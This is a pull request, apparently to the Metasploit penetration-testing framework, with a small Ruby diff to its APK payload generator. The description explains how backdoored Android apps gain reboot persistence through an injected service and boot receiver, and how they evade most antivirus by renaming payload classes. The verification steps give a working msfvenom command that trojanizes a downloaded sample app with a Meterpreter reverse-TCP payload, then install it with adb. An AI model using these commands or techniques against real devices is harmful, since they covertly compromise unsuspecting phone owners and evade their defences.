### PR TITLE
Fix apk injection script to include android payload service and broadcast receivers

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -320,7 +320,7 @@ module Msf
         gen_payload = raw_payload
       elsif payload.start_with? "android/" and not template.blank?
         cli_print "Using APK template: #{template}"
-        apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new()
+        apk_backdoor = ::Msf::Payload::Apk.new
         raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
         cli_print "Payload size: #{raw_payload.length} bytes"
         gen_payload = raw_payload


### PR DESCRIPTION
This changes fixes the APK injection code so that it also injects the Android service and BOOT_COMPLETED broadcast receiver. This means that a backdoored APK will only need to be run once and when the phone reboots it will reconnect automatically.
The change also moves the payload classes into the original apps package namespace (as opposed to just com.metasploit.stage), which defeats most Android antivirus (for the time being).

Requires https://github.com/rapid7/metasploit-payloads/pull/126
## Verification
- [x] Download and backdoor an apk:

```
wget https://github.com/heavysixer/phonegap-camera-sample/blob/master/bin/CameraSample.apk?raw=true -O CameraSample.apk
./msfvenom -x CameraSample.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o CameraSample_backdoored.apk
```
- [x] Install it on a device, e.g `adb install CameraSample_backdoored.apk` and run the app.
- [x] **Verify** you still get a session as before.
- [x] **Verify** reboot the device, ensure the session reconnects automatically.
